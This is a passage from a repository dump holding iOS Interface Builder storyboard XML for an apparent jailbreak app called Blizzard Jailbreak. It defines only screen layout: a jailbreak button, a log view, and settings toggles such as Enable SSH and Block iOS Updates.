translatesAutoresizingMaskIntoConstraints=\"NO\" id=\"jb4-3I-IKu\">\n                                <rect key=\"frame\" x=\"62\" y=\"180\" width=\"196\" height=\"208\"/>\n                                <constraints>\n                                    <constraint firstAttribute=\"width\" constant=\"196\" id=\"lWd-Ki-AVK\"/>\n                                    <constraint firstAttribute=\"height\" constant=\"208\" id=\"sRV-19-hKJ\"/>\n                                </constraints>\n                            </imageView>\n                        </subviews>\n                        <color key=\"backgroundColor\" red=\"1\" green=\"1\" blue=\"1\" alpha=\"1\" colorSpace=\"custom\" customColorSpace=\"sRGB\"/>\n                        <constraints>\n                            <constraint firstItem=\"7k9-n9-bzj\" firstAttribute=\"leading\" secondItem=\"6Tk-OE-BBY\" secondAttribute=\"leading\" id=\"9dU-lB-Nhq\"/>\n                            <constraint firstItem=\"6Tk-OE-BBY\" firstAttribute=\"bottom\" secondItem=\"jb4-3I-IKu\" secondAttribute=\"bottom\" constant=\"180\" id=\"9rq-KG-m8u\"/>\n                            <constraint firstItem=\"7k9-n9-bzj\" firstAttribute=\"trailing\" secondItem=\"6Tk-OE-BBY\" secondAttribute=\"trailing\" id=\"Jed-NM-vvM\"/>\n                            <constraint firstItem=\"6Tk-OE-BBY\" firstAttribute=\"trailing\" secondItem=\"jb4-3I-IKu\" secondAttribute=\"trailing\" constant=\"62\" id=\"Mx7-B6-Tcn\"/>\n                            <constraint firstAttribute=\"bottom\" secondItem=\"7k9-n9-bzj\" secondAttribute=\"bottom\" id=\"b8b-ot-z8g\"/>\n                            <constraint firstItem=\"jb4-3I-IKu\" firstAttribute=\"top\" secondItem=\"6Tk-OE-BBY\" secondAttribute=\"top\" constant=\"160\" id=\"bdZ-qC-bvW\"/>\n                            <constraint firstItem=\"7k9-n9-bzj\" firstAttribute=\"top\" secondItem=\"Ze5-6b-2t3\" secondAttribute=\"top\" id=\"d7b-ZU-nBc\"/>\n                            <constraint 
firstItem=\"jb4-3I-IKu\" firstAttribute=\"leading\" secondItem=\"6Tk-OE-BBY\" secondAttribute=\"leading\" constant=\"62\" id=\"gBS-ew-kDl\"/>\n                        </constraints>\n                        <viewLayoutGuide key=\"safeArea\" id=\"6Tk-OE-BBY\"/>\n                    </view>\n                </viewController>\n                <placeholder placeholderIdentifier=\"IBFirstResponder\" id=\"iYj-Kq-Ea1\" userLabel=\"First Responder\" sceneMemberID=\"firstResponder\"/>\n            </objects>\n            <point key=\"canvasLocation\" x=\"50.625\" y=\"372.88732394366195\"/>\n        </scene>\n    </scenes>\n    <resources>\n        <image name=\"jailbreak_wallpaper\" width=\"834\" height=\"1194\"/>\n        <image name=\"winter\" width=\"256\" height=\"256\"/>\n    </resources>\n</document>\n"
  },
  {
    "path": "Blizzard Jailbreak/Base.lproj/Main.storyboard",
    "content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<document type=\"com.apple.InterfaceBuilder3.CocoaTouch.Storyboard.XIB\" version=\"3.0\" toolsVersion=\"14460.31\" targetRuntime=\"iOS.CocoaTouch\" propertyAccessControl=\"none\" useAutolayout=\"YES\" useTraitCollections=\"YES\" useSafeAreas=\"YES\" colorMatched=\"YES\" initialViewController=\"BYZ-38-t0r\">\n    <device id=\"retina4_0\" orientation=\"portrait\">\n        <adaptation id=\"fullscreen\"/>\n    </device>\n    <dependencies>\n        <deployment identifier=\"iOS\"/>\n        <plugIn identifier=\"com.apple.InterfaceBuilder.IBCocoaTouchPlugin\" version=\"14460.20\"/>\n        <capability name=\"Safe area layout guides\" minToolsVersion=\"9.0\"/>\n        <capability name=\"documents saved in the Xcode 8 format\" minToolsVersion=\"8.0\"/>\n    </dependencies>\n    <scenes>\n        <!--Blizzard View-->\n        <scene sceneID=\"tne-QT-ifu\">\n            <objects>\n                <viewController id=\"BYZ-38-t0r\" customClass=\"blizzardView\" sceneMemberID=\"viewController\">\n                    <view key=\"view\" contentMode=\"scaleToFill\" id=\"8bC-Xf-vdC\">\n                        <rect key=\"frame\" x=\"0.0\" y=\"0.0\" width=\"320\" height=\"568\"/>\n                        <autoresizingMask key=\"autoresizingMask\" widthSizable=\"YES\" heightSizable=\"YES\"/>\n                        <subviews>\n                            <imageView userInteractionEnabled=\"NO\" contentMode=\"scaleToFill\" horizontalHuggingPriority=\"251\" verticalHuggingPriority=\"251\" image=\"jailbreak_wallpaper\" adjustsImageSizeForAccessibilityContentSizeCategory=\"YES\" translatesAutoresizingMaskIntoConstraints=\"NO\" id=\"IMk-rn-peb\">\n                                <rect key=\"frame\" x=\"0.0\" y=\"0.0\" width=\"320\" height=\"602\"/>\n                            </imageView>\n                            <imageView userInteractionEnabled=\"NO\" contentMode=\"scaleAspectFit\" horizontalHuggingPriority=\"251\" 
verticalHuggingPriority=\"251\" image=\"winter\" translatesAutoresizingMaskIntoConstraints=\"NO\" id=\"Suw-j9-Sy3\">\n                                <rect key=\"frame\" x=\"32\" y=\"34\" width=\"256\" height=\"150\"/>\n                                <constraints>\n                                    <constraint firstAttribute=\"height\" constant=\"150\" id=\"4cz-MJ-nsh\"/>\n                                    <constraint firstAttribute=\"height\" constant=\"150\" id=\"veZ-H9-MjK\"/>\n                                </constraints>\n                            </imageView>\n                            <label opaque=\"NO\" userInteractionEnabled=\"NO\" contentMode=\"left\" horizontalHuggingPriority=\"251\" verticalHuggingPriority=\"251\" text=\"by GeoSn0w (@FCE365)\" textAlignment=\"center\" lineBreakMode=\"tailTruncation\" baselineAdjustment=\"alignBaselines\" adjustsFontForContentSizeCategory=\"YES\" adjustsFontSizeToFit=\"NO\" translatesAutoresizingMaskIntoConstraints=\"NO\" id=\"2nt-NA-u5V\">\n                                <rect key=\"frame\" x=\"30\" y=\"527\" width=\"260\" height=\"21\"/>\n                                <constraints>\n                                    <constraint firstAttribute=\"height\" constant=\"21\" id=\"r0k-jY-g8T\"/>\n                                </constraints>\n                                <fontDescription key=\"fontDescription\" type=\"system\" pointSize=\"17\"/>\n                                <color key=\"textColor\" white=\"1\" alpha=\"1\" colorSpace=\"custom\" customColorSpace=\"genericGamma22GrayColorSpace\"/>\n                                <nil key=\"highlightedColor\"/>\n                            </label>\n                            <label opaque=\"NO\" userInteractionEnabled=\"NO\" contentMode=\"left\" horizontalHuggingPriority=\"251\" verticalHuggingPriority=\"251\" text=\"BLIZZARD JAILBREAK\" textAlignment=\"center\" lineBreakMode=\"tailTruncation\" baselineAdjustment=\"alignBaselines\" 
adjustsFontForContentSizeCategory=\"YES\" adjustsFontSizeToFit=\"NO\" translatesAutoresizingMaskIntoConstraints=\"NO\" id=\"fV6-tC-CJz\">\n                                <rect key=\"frame\" x=\"30\" y=\"190\" width=\"260\" height=\"29\"/>\n                                <constraints>\n                                    <constraint firstAttribute=\"height\" constant=\"29\" id=\"ZrZ-fC-3IJ\"/>\n                                </constraints>\n                                <fontDescription key=\"fontDescription\" type=\"system\" weight=\"light\" pointSize=\"24\"/>\n                                <color key=\"textColor\" white=\"1\" alpha=\"1\" colorSpace=\"custom\" customColorSpace=\"genericGamma22GrayColorSpace\"/>\n                                <nil key=\"highlightedColor\"/>\n                            </label>\n                            <button opaque=\"NO\" alpha=\"0.84999999999999998\" contentMode=\"scaleToFill\" contentHorizontalAlignment=\"center\" contentVerticalAlignment=\"center\" lineBreakMode=\"middleTruncation\" translatesAutoresizingMaskIntoConstraints=\"NO\" id=\"ZQt-HB-KcQ\">\n                                <rect key=\"frame\" x=\"40\" y=\"260\" width=\"240\" height=\"48\"/>\n                                <constraints>\n                                    <constraint firstAttribute=\"height\" constant=\"48\" id=\"n5b-aE-1UC\"/>\n                                </constraints>\n                                <fontDescription key=\"fontDescription\" name=\"HelveticaNeue-Light\" family=\"Helvetica Neue\" pointSize=\"18\"/>\n                                <state key=\"normal\" title=\"JAILBREAK\" backgroundImage=\"button_mask\">\n                                    <color key=\"titleColor\" cocoaTouchSystemColor=\"darkTextColor\"/>\n                                </state>\n                                <userDefinedRuntimeAttributes>\n                                    <userDefinedRuntimeAttribute type=\"number\" 
keyPath=\"layer.cornerRadius\">\n                                        <integer key=\"value\" value=\"20\"/>\n                                    </userDefinedRuntimeAttribute>\n                                    <userDefinedRuntimeAttribute type=\"boolean\" keyPath=\"clipsToBounds\" value=\"YES\"/>\n                                </userDefinedRuntimeAttributes>\n                                <variation key=\"heightClass=regular-widthClass=regular\">\n                                    <fontDescription key=\"fontDescription\" name=\"HelveticaNeue-Light\" family=\"Helvetica Neue\" pointSize=\"18\"/>\n                                </variation>\n                                <connections>\n                                    <action selector=\"blizzardInit:\" destination=\"BYZ-38-t0r\" eventType=\"touchUpInside\" id=\"Jh7-HL-oQs\"/>\n                                </connections>\n                            </button>\n                            <button opaque=\"NO\" contentMode=\"scaleToFill\" contentHorizontalAlignment=\"center\" contentVerticalAlignment=\"center\" lineBreakMode=\"middleTruncation\" translatesAutoresizingMaskIntoConstraints=\"NO\" id=\"Lg7-ka-Z5I\">\n                                <rect key=\"frame\" x=\"103\" y=\"329.5\" width=\"114\" height=\"38\"/>\n                                <constraints>\n                                    <constraint firstAttribute=\"height\" constant=\"38\" id=\"AWs-yW-e2p\"/>\n                                </constraints>\n                                <state key=\"normal\" title=\"Settings\" backgroundImage=\"button_mask\">\n                                    <color key=\"titleColor\" red=\"0.059621539360000003\" green=\"0.12937427879999999\" blue=\"0.23696567360000001\" alpha=\"1\" colorSpace=\"custom\" customColorSpace=\"sRGB\"/>\n                                </state>\n                                <userDefinedRuntimeAttributes>\n                                    <userDefinedRuntimeAttribute 
type=\"number\" keyPath=\"layer.cornerRadius\">\n                                        <integer key=\"value\" value=\"20\"/>\n                                    </userDefinedRuntimeAttribute>\n                                    <userDefinedRuntimeAttribute type=\"boolean\" keyPath=\"clipsToBounds\" value=\"YES\"/>\n                                </userDefinedRuntimeAttributes>\n                                <connections>\n                                    <action selector=\"injectSettingsUI:\" destination=\"BYZ-38-t0r\" eventType=\"touchUpInside\" id=\"1dX-EC-0pA\"/>\n                                </connections>\n                            </button>\n                        </subviews>\n                        <color key=\"backgroundColor\" red=\"1\" green=\"1\" blue=\"1\" alpha=\"1\" colorSpace=\"custom\" customColorSpace=\"sRGB\"/>\n                        <constraints>\n                            <constraint firstItem=\"fV6-tC-CJz\" firstAttribute=\"top\" secondItem=\"Suw-j9-Sy3\" secondAttribute=\"bottom\" constant=\"6\" id=\"3Xc-Yf-VaY\"/>\n                            <constraint firstItem=\"IMk-rn-peb\" firstAttribute=\"trailing\" secondItem=\"6Tk-OE-BBY\" secondAttribute=\"trailing\" id=\"5Rf-lp-HFr\"/>\n                            <constraint firstItem=\"ZQt-HB-KcQ\" firstAttribute=\"top\" secondItem=\"Suw-j9-Sy3\" secondAttribute=\"bottom\" constant=\"76\" id=\"8VU-CU-HbD\"/>\n                            <constraint firstItem=\"ZQt-HB-KcQ\" firstAttribute=\"leading\" secondItem=\"6Tk-OE-BBY\" secondAttribute=\"leading\" constant=\"40\" id=\"CEp-oy-DxF\"/>\n                            <constraint firstItem=\"IMk-rn-peb\" firstAttribute=\"top\" secondItem=\"8bC-Xf-vdC\" secondAttribute=\"top\" id=\"COe-Os-yxH\"/>\n                            <constraint firstItem=\"fV6-tC-CJz\" firstAttribute=\"leading\" secondItem=\"6Tk-OE-BBY\" secondAttribute=\"leading\" constant=\"30\" id=\"Cdz-ud-Ycy\"/>\n                            <constraint 
firstItem=\"Lg7-ka-Z5I\" firstAttribute=\"top\" secondItem=\"ZQt-HB-KcQ\" secondAttribute=\"bottom\" constant=\"21.5\" id=\"CvP-Ok-6ZK\"/>\n                            <constraint firstItem=\"Suw-j9-Sy3\" firstAttribute=\"centerY\" secondItem=\"8bC-Xf-vdC\" secondAttribute=\"centerY\" constant=\"-175\" id=\"HOt-q2-t22\"/>\n                            <constraint firstItem=\"6Tk-OE-BBY\" firstAttribute=\"trailing\" secondItem=\"ZQt-HB-KcQ\" secondAttribute=\"trailing\" constant=\"40\" id=\"SSW-cU-K2f\"/>\n                            <constraint firstItem=\"6Tk-OE-BBY\" firstAttribute=\"bottom\" secondItem=\"2nt-NA-u5V\" secondAttribute=\"bottom\" constant=\"20\" id=\"TkI-sm-9oq\"/>\n                            <constraint firstItem=\"ZQt-HB-KcQ\" firstAttribute=\"centerY\" secondItem=\"8bC-Xf-vdC\" secondAttribute=\"centerY\" id=\"WqY-g3-Csa\"/>\n                            <constraint firstItem=\"6Tk-OE-BBY\" firstAttribute=\"trailing\" secondItem=\"fV6-tC-CJz\" secondAttribute=\"trailing\" constant=\"30\" id=\"Wxw-hN-w3e\"/>\n                            <constraint firstItem=\"Suw-j9-Sy3\" firstAttribute=\"centerX\" secondItem=\"8bC-Xf-vdC\" secondAttribute=\"centerX\" id=\"aLV-fL-jbw\"/>\n                            <constraint firstAttribute=\"bottom\" secondItem=\"IMk-rn-peb\" secondAttribute=\"bottom\" constant=\"-34\" id=\"abB-9D-Xd3\"/>\n                            <constraint firstItem=\"2nt-NA-u5V\" firstAttribute=\"leading\" secondItem=\"6Tk-OE-BBY\" secondAttribute=\"leading\" constant=\"30\" id=\"eGu-pX-zhC\"/>\n                            <constraint firstItem=\"Lg7-ka-Z5I\" firstAttribute=\"leading\" secondItem=\"6Tk-OE-BBY\" secondAttribute=\"leading\" constant=\"103\" id=\"pYK-Pg-NCr\"/>\n                            <constraint firstItem=\"6Tk-OE-BBY\" firstAttribute=\"trailing\" secondItem=\"Lg7-ka-Z5I\" secondAttribute=\"trailing\" constant=\"103\" id=\"tr5-08-hBA\"/>\n                            <constraint firstItem=\"IMk-rn-peb\" 
firstAttribute=\"leading\" secondItem=\"6Tk-OE-BBY\" secondAttribute=\"leading\" id=\"uRA-zq-YiX\"/>\n                            <constraint firstItem=\"6Tk-OE-BBY\" firstAttribute=\"trailing\" secondItem=\"2nt-NA-u5V\" secondAttribute=\"trailing\" constant=\"30\" id=\"wiI-AC-2N6\"/>\n                            <constraint firstItem=\"ZQt-HB-KcQ\" firstAttribute=\"centerX\" secondItem=\"8bC-Xf-vdC\" secondAttribute=\"centerX\" id=\"yPD-m1-UWo\"/>\n                        </constraints>\n                        <viewLayoutGuide key=\"safeArea\" id=\"6Tk-OE-BBY\"/>\n                    </view>\n                    <connections>\n                        <outlet property=\"blizzardInit\" destination=\"ZQt-HB-KcQ\" id=\"TU9-7F-pmQ\"/>\n                        <segue destination=\"1cP-8T-Syx\" kind=\"modal\" identifier=\"vc\" modalPresentationStyle=\"fullScreen\" modalTransitionStyle=\"coverVertical\" id=\"5ML-c8-fwh\"/>\n                        <segue destination=\"ccD-bF-PLb\" kind=\"showDetail\" identifier=\"settingsView\" id=\"IJs-qc-Ey8\"/>\n                    </connections>\n                </viewController>\n                <placeholder placeholderIdentifier=\"IBFirstResponder\" id=\"dkx-z0-nzr\" sceneMemberID=\"firstResponder\"/>\n            </objects>\n            <point key=\"canvasLocation\" x=\"-9.375\" y=\"132.04225352112675\"/>\n        </scene>\n        <!--Jailbreaking-->\n        <scene sceneID=\"Urq-5U-iiU\">\n            <objects>\n                <viewController storyboardIdentifier=\"vc\" title=\"Jailbreaking\" modalPresentationStyle=\"pageSheet\" useStoryboardIdentifierAsRestorationIdentifier=\"YES\" id=\"1cP-8T-Syx\" customClass=\"BlizzardLog\" sceneMemberID=\"viewController\">\n                    <view key=\"view\" contentMode=\"scaleToFill\" id=\"m8P-iR-Ifq\">\n                        <rect key=\"frame\" x=\"0.0\" y=\"0.0\" width=\"320\" height=\"568\"/>\n                        <autoresizingMask key=\"autoresizingMask\" widthSizable=\"YES\" 
heightSizable=\"YES\"/>\n                        <subviews>\n                            <textView clipsSubviews=\"YES\" multipleTouchEnabled=\"YES\" contentMode=\"scaleToFill\" indicatorStyle=\"white\" keyboardDismissMode=\"interactive\" editable=\"NO\" adjustsFontForContentSizeCategory=\"YES\" translatesAutoresizingMaskIntoConstraints=\"NO\" id=\"fte-IW-BJz\">\n                                <rect key=\"frame\" x=\"0.0\" y=\"20\" width=\"320\" height=\"466\"/>\n                                <color key=\"backgroundColor\" red=\"0.059621539360000003\" green=\"0.12937427879999999\" blue=\"0.23696567360000001\" alpha=\"1\" colorSpace=\"custom\" customColorSpace=\"sRGB\"/>\n                                <color key=\"textColor\" white=\"1\" alpha=\"1\" colorSpace=\"custom\" customColorSpace=\"genericGamma22GrayColorSpace\"/>\n                                <fontDescription key=\"fontDescription\" name=\"Avenir-Book\" family=\"Avenir\" pointSize=\"14\"/>\n                                <textInputTraits key=\"textInputTraits\" autocapitalizationType=\"sentences\"/>\n                            </textView>\n                            <button opaque=\"NO\" alpha=\"0.69999999999999996\" contentMode=\"scaleToFill\" contentHorizontalAlignment=\"center\" contentVerticalAlignment=\"center\" lineBreakMode=\"middleTruncation\" translatesAutoresizingMaskIntoConstraints=\"NO\" id=\"6gp-uK-PGB\">\n                                <rect key=\"frame\" x=\"30\" y=\"494\" width=\"260\" height=\"54\"/>\n                                <constraints>\n                                    <constraint firstAttribute=\"height\" constant=\"54\" id=\"yAp-AT-6Rb\"/>\n                                </constraints>\n                                <fontDescription key=\"fontDescription\" name=\"HelveticaNeue-Light\" family=\"Helvetica Neue\" pointSize=\"18\"/>\n                                <state key=\"normal\" title=\"Dismiss Jailbreak Log\" backgroundImage=\"button_mask\">\n             
                       <color key=\"titleColor\" cocoaTouchSystemColor=\"darkTextColor\"/>\n                                </state>\n                                <userDefinedRuntimeAttributes>\n                                    <userDefinedRuntimeAttribute type=\"number\" keyPath=\"layer.cornerRadius\">\n                                        <integer key=\"value\" value=\"20\"/>\n                                    </userDefinedRuntimeAttribute>\n                                    <userDefinedRuntimeAttribute type=\"boolean\" keyPath=\"clipsToBounds\" value=\"YES\"/>\n                                </userDefinedRuntimeAttributes>\n                                <variation key=\"heightClass=regular-widthClass=regular\">\n                                    <fontDescription key=\"fontDescription\" name=\"HelveticaNeue-Light\" family=\"Helvetica Neue\" pointSize=\"18\"/>\n                                </variation>\n                                <connections>\n                                    <action selector=\"blizzardInit:\" destination=\"BYZ-38-t0r\" eventType=\"touchUpInside\" id=\"Glp-ZU-t1C\"/>\n                                    <action selector=\"dismissLogWindow:\" destination=\"1cP-8T-Syx\" eventType=\"touchUpInside\" id=\"mdK-Eu-11O\"/>\n                                </connections>\n                            </button>\n                            <imageView userInteractionEnabled=\"NO\" alpha=\"0.02\" contentMode=\"scaleToFill\" horizontalHuggingPriority=\"251\" verticalHuggingPriority=\"251\" image=\"winter\" translatesAutoresizingMaskIntoConstraints=\"NO\" id=\"ZQT-Zx-TGV\">\n                                <rect key=\"frame\" x=\"32\" y=\"156\" width=\"256\" height=\"256\"/>\n                            </imageView>\n                        </subviews>\n                        <color key=\"backgroundColor\" red=\"0.059621539360400544\" green=\"0.12937427881651739\" blue=\"0.23696567357512954\" alpha=\"1\" colorSpace=\"custom\" 
customColorSpace=\"sRGB\"/>\n                        <color key=\"tintColor\" white=\"0.0\" alpha=\"1\" colorSpace=\"custom\" customColorSpace=\"genericGamma22GrayColorSpace\"/>\n                        <constraints>\n                            <constraint firstItem=\"ZQT-Zx-TGV\" firstAttribute=\"centerX\" secondItem=\"m8P-iR-Ifq\" secondAttribute=\"centerX\" id=\"6QC-jo-CBx\"/>\n                            <constraint firstItem=\"Svv-JT-Cgl\" firstAttribute=\"trailing\" secondItem=\"6gp-uK-PGB\" secondAttribute=\"trailing\" constant=\"30\" id=\"A4t-gI-UZG\"/>\n                            <constraint firstItem=\"fte-IW-BJz\" firstAttribute=\"trailing\" secondItem=\"Svv-JT-Cgl\" secondAttribute=\"trailing\" id=\"BnC-xG-BEL\"/>\n                            <constraint firstItem=\"fte-IW-BJz\" firstAttribute=\"centerX\" secondItem=\"m8P-iR-Ifq\" secondAttribute=\"centerX\" id=\"De6-Ez-cWn\"/>\n                            <constraint firstItem=\"6gp-uK-PGB\" firstAttribute=\"leading\" secondItem=\"Svv-JT-Cgl\" secondAttribute=\"leading\" constant=\"30\" id=\"K10-i5-DpT\"/>\n                            <constraint firstItem=\"Svv-JT-Cgl\" firstAttribute=\"bottom\" secondItem=\"6gp-uK-PGB\" secondAttribute=\"bottom\" constant=\"20\" id=\"LQ4-mI-vaj\"/>\n                            <constraint firstItem=\"ZQT-Zx-TGV\" firstAttribute=\"centerY\" secondItem=\"m8P-iR-Ifq\" secondAttribute=\"centerY\" id=\"Nca-Bv-pGg\"/>\n                            <constraint firstItem=\"fte-IW-BJz\" firstAttribute=\"leading\" secondItem=\"Svv-JT-Cgl\" secondAttribute=\"leading\" id=\"SMt-1M-7FG\"/>\n                            <constraint firstItem=\"6gp-uK-PGB\" firstAttribute=\"top\" secondItem=\"fte-IW-BJz\" secondAttribute=\"bottom\" constant=\"8\" id=\"fU8-e9-6aP\"/>\n                            <constraint firstItem=\"fte-IW-BJz\" firstAttribute=\"top\" secondItem=\"Svv-JT-Cgl\" secondAttribute=\"top\" id=\"qMd-od-gY8\"/>\n                        </constraints>\n                    
    <viewLayoutGuide key=\"safeArea\" id=\"Svv-JT-Cgl\"/>\n                    </view>\n                    <connections>\n                        <outlet property=\"dismissLog\" destination=\"6gp-uK-PGB\" id=\"JaG-sa-OQZ\"/>\n                        <outlet property=\"uiLogView\" destination=\"fte-IW-BJz\" id=\"fyt-x8-grl\"/>\n                    </connections>\n                </viewController>\n                <placeholder placeholderIdentifier=\"IBFirstResponder\" id=\"yZA-KH-vhq\" userLabel=\"First Responder\" sceneMemberID=\"firstResponder\"/>\n            </objects>\n            <point key=\"canvasLocation\" x=\"732\" y=\"132\"/>\n        </scene>\n        <!--Blizzard View-->\n        <scene sceneID=\"MPx-FZ-cTW\">\n            <objects>\n                <viewController id=\"ccD-bF-PLb\" customClass=\"blizzardView\" sceneMemberID=\"viewController\">\n                    <view key=\"view\" contentMode=\"scaleToFill\" id=\"e5t-i2-8ZF\">\n                        <rect key=\"frame\" x=\"0.0\" y=\"0.0\" width=\"320\" height=\"568\"/>\n                        <autoresizingMask key=\"autoresizingMask\" widthSizable=\"YES\" heightSizable=\"YES\"/>\n                        <subviews>\n                            <imageView userInteractionEnabled=\"NO\" alpha=\"0.019999999552965164\" contentMode=\"scaleToFill\" horizontalHuggingPriority=\"251\" verticalHuggingPriority=\"251\" image=\"winter\" translatesAutoresizingMaskIntoConstraints=\"NO\" id=\"pjT-vc-P8o\">\n                                <rect key=\"frame\" x=\"32\" y=\"156\" width=\"256\" height=\"256\"/>\n                            </imageView>\n                            <label opaque=\"NO\" userInteractionEnabled=\"NO\" contentMode=\"left\" horizontalHuggingPriority=\"251\" verticalHuggingPriority=\"251\" text=\"BLIZZARD JAILBREAK\" textAlignment=\"center\" lineBreakMode=\"tailTruncation\" baselineAdjustment=\"alignBaselines\" minimumFontSize=\"9\" adjustsFontForContentSizeCategory=\"YES\" 
translatesAutoresizingMaskIntoConstraints=\"NO\" id=\"BNm-0w-E3T\">\n                                <rect key=\"frame\" x=\"38\" y=\"27\" width=\"244\" height=\"30\"/>\n                                <constraints>\n                                    <constraint firstAttribute=\"height\" constant=\"30\" id=\"8h3-rS-OsF\"/>\n                                </constraints>\n                                <fontDescription key=\"fontDescription\" type=\"system\" pointSize=\"25\"/>\n                                <color key=\"textColor\" white=\"1\" alpha=\"1\" colorSpace=\"custom\" customColorSpace=\"genericGamma22GrayColorSpace\"/>\n                                <nil key=\"highlightedColor\"/>\n                            </label>\n                            <label opaque=\"NO\" userInteractionEnabled=\"NO\" contentMode=\"left\" horizontalHuggingPriority=\"251\" verticalHuggingPriority=\"251\" text=\"Enable SSH\" lineBreakMode=\"tailTruncation\" baselineAdjustment=\"alignBaselines\" minimumFontSize=\"9\" adjustsFontForContentSizeCategory=\"YES\" translatesAutoresizingMaskIntoConstraints=\"NO\" id=\"LlD-Gd-k5x\">\n                                <rect key=\"frame\" x=\"16\" y=\"76\" width=\"100\" height=\"23\"/>\n                                <fontDescription key=\"fontDescription\" type=\"system\" pointSize=\"19\"/>\n                                <color key=\"textColor\" white=\"1\" alpha=\"1\" colorSpace=\"custom\" customColorSpace=\"genericGamma22GrayColorSpace\"/>\n                                <nil key=\"highlightedColor\"/>\n                            </label>\n                            <switch opaque=\"NO\" contentMode=\"scaleToFill\" horizontalHuggingPriority=\"750\" verticalHuggingPriority=\"750\" contentHorizontalAlignment=\"center\" contentVerticalAlignment=\"center\" on=\"YES\" translatesAutoresizingMaskIntoConstraints=\"NO\" id=\"Lo2-8G-vdS\">\n                                <rect key=\"frame\" x=\"253\" y=\"71\" width=\"51\" 
height=\"31\"/>\n                                <color key=\"onTintColor\" red=\"0.72446093024843261\" green=\"0.64574749504835438\" blue=\"1\" alpha=\"1\" colorSpace=\"custom\" customColorSpace=\"sRGB\"/>\n                                <color key=\"thumbTintColor\" white=\"1\" alpha=\"1\" colorSpace=\"custom\" customColorSpace=\"genericGamma22GrayColorSpace\"/>\n                            </switch>\n                            <label opaque=\"NO\" userInteractionEnabled=\"NO\" contentMode=\"left\" horizontalHuggingPriority=\"251\" verticalHuggingPriority=\"251\" text=\"Enable Substitute\" lineBreakMode=\"tailTruncation\" baselineAdjustment=\"alignBaselines\" minimumFontSize=\"9\" adjustsFontForContentSizeCategory=\"YES\" translatesAutoresizingMaskIntoConstraints=\"NO\" id=\"F44-ZB-bbA\">\n                                <rect key=\"frame\" x=\"16\" y=\"115\" width=\"150\" height=\"23\"/>\n                                <fontDescription key=\"fontDescription\" type=\"system\" pointSize=\"19\"/>\n                                <color key=\"textColor\" white=\"1\" alpha=\"1\" colorSpace=\"custom\" customColorSpace=\"genericGamma22GrayColorSpace\"/>\n                                <nil key=\"highlightedColor\"/>\n                            </label>\n                            <switch opaque=\"NO\" contentMode=\"scaleToFill\" horizontalHuggingPriority=\"750\" verticalHuggingPriority=\"750\" contentHorizontalAlignment=\"center\" contentVerticalAlignment=\"center\" on=\"YES\" translatesAutoresizingMaskIntoConstraints=\"NO\" id=\"c6c-Vb-Re1\">\n                                <rect key=\"frame\" x=\"253\" y=\"110\" width=\"51\" height=\"31\"/>\n                                <color key=\"onTintColor\" red=\"0.72446093020000002\" green=\"0.64574749499999995\" blue=\"1\" alpha=\"1\" colorSpace=\"custom\" customColorSpace=\"sRGB\"/>\n                                <color key=\"thumbTintColor\" white=\"1\" alpha=\"1\" colorSpace=\"custom\" 
customColorSpace=\"genericGamma22GrayColorSpace\"/>\n                            </switch>\n                            <label opaque=\"NO\" userInteractionEnabled=\"NO\" contentMode=\"left\" horizontalHuggingPriority=\"251\" verticalHuggingPriority=\"251\" text=\"Provision as Development\" lineBreakMode=\"tailTruncation\" baselineAdjustment=\"alignBaselines\" minimumFontSize=\"9\" adjustsFontForContentSizeCategory=\"YES\" translatesAutoresizingMaskIntoConstraints=\"NO\" id=\"YV7-ks-D53\">\n                                <rect key=\"frame\" x=\"16\" y=\"154\" width=\"220\" height=\"23\"/>\n                                <fontDescription key=\"fontDescription\" type=\"system\" pointSize=\"19\"/>\n                                <color key=\"textColor\" white=\"1\" alpha=\"1\" colorSpace=\"custom\" customColorSpace=\"genericGamma22GrayColorSpace\"/>\n                                <nil key=\"highlightedColor\"/>\n                            </label>\n                            <switch opaque=\"NO\" contentMode=\"scaleToFill\" horizontalHuggingPriority=\"750\" verticalHuggingPriority=\"750\" contentHorizontalAlignment=\"center\" contentVerticalAlignment=\"center\" on=\"YES\" translatesAutoresizingMaskIntoConstraints=\"NO\" id=\"X8I-y7-WsC\">\n                                <rect key=\"frame\" x=\"253\" y=\"149\" width=\"51\" height=\"31\"/>\n                                <color key=\"onTintColor\" red=\"0.72446093020000002\" green=\"0.64574749499999995\" blue=\"1\" alpha=\"1\" colorSpace=\"custom\" customColorSpace=\"sRGB\"/>\n                                <color key=\"thumbTintColor\" white=\"1\" alpha=\"1\" colorSpace=\"custom\" customColorSpace=\"genericGamma22GrayColorSpace\"/>\n                            </switch>\n                            <label opaque=\"NO\" userInteractionEnabled=\"NO\" contentMode=\"left\" horizontalHuggingPriority=\"251\" verticalHuggingPriority=\"251\" text=\"Block iOS Updates\" lineBreakMode=\"tailTruncation\" 
baselineAdjustment=\"alignBaselines\" minimumFontSize=\"9\" adjustsFontForContentSizeCategory=\"YES\" translatesAutoresizingMaskIntoConstraints=\"NO\" id=\"yAE-R0-Bul\">\n                                <rect key=\"frame\" x=\"16\" y=\"193\" width=\"159\" height=\"23\"/>\n                                <fontDescription key=\"fontDescription\" type=\"system\" pointSize=\"19\"/>\n                                <color key=\"textColor\" white=\"1\" alpha=\"1\" colorSpace=\"custom\" customColorSpace=\"genericGamma22GrayColorSpace\"/>\n                                <nil key=\"highlightedColor\"/>\n                            </label>\n                            <switch opaque=\"NO\" contentMode=\"scaleToFill\" horizontalHuggingPriority=\"750\" verticalHuggingPriority=\"750\" contentHorizontalAlignment=\"center\" contentVerticalAlignment=\"center\" on=\"YES\" translatesAutoresizingMaskIntoConstraints=\"NO\" id=\"oAF-uh-bO8\">\n                                <rect key=\"frame\" x=\"253\" y=\"188\" width=\"51\" height=\"31\"/>\n                                <color key=\"onTintColor\" red=\"0.72446093020000002\" green=\"0.64574749499999995\" blue=\"1\" alpha=\"1\" colorSpace=\"custom\" customColorSpace=\"sRGB\"/>\n                                <color key=\"thumbTintColor\" white=\"1\" alpha=\"1\" colorSpace=\"custom\" customColorSpace=\"genericGamma22GrayColorSpace\"/>\n                            </switch>\n                            <button opaque=\"NO\" alpha=\"0.84999999999999998\" contentMode=\"scaleToFill\" contentHorizontalAlignment=\"center\" contentVerticalAlignment=\"center\" lineBreakMode=\"middleTruncation\" translatesAutoresizingMaskIntoConstraints=\"NO\" id=\"mh9-gl-or8\">\n                                <rect key=\"frame\" x=\"69\" y=\"314\" width=\"181\" height=\"40\"/>\n                                <constraints>\n                                    <constraint firstAttribute=\"height\" constant=\"40\" id=\"50J-ds-OGx\"/>\n                      
